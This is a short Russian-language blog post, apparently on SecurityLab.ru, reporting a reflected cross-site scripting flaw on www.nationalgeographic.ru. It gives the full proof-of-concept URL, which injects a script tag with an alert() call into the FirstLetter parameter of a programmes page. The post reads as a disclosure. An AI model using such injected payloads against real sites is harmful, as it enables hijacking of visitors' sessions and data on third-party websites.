XSS на сайте www.nationalgeographic.ru

XSS на сайте www.nationalgeographic.ru
15 мин поиска и...

http://www.nationalgeographic.ru/Programmes/ProgrammesAz.aspx?FirstLetter=%3Cscript%3Ejavascript:alert();%3C/script%3E
nationalgeographic XSS
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.

Старость — это просто ошибка кода

Генетики уже нашли способ её «исправить». Вопрос только в том, кто узнает об этом первым.

Получить доступ

Агиевич Игорь aka Shanker

Мысли о собственной жизни ИТ-аналитика, обретающие очертания в голове и формируемые средством их выражения - родной речью